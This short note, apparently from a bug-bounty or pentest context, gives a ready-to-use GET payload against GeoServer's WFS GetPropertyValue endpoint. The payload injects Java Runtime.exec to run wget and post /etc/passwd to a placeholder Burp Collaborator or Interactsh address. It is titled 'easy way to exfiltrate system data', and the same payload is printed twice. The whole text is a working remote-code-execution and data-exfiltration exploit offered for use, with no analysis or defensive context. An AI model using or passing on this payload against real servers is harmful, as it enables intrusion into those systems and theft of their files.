easy way to exfiltrate system data
Simple GET Payload:
"https://REDACTED[.]com/geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=demo_examples:lanl_hex_chromium_shallow_2020&valueReference=exec(java.lang.Runtime.getRuntime(),'wget+--post-file=/etc/passwd+YOUR_BURP_COLLABORATOR_ADDRESS_OR_INTERACTSH_HERE'"
Simple GET Payload:
"https://REDACTED[.]com/geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=demo_examples:lanl_hex_chromium_shallow_2020&valueReference=exec(java.lang.Runtime.getRuntime(),'wget+--post-file=/etc/passwd+YOUR_BURP_COLLABORATOR_ADDRESS_OR_INTERACTSH_HERE'"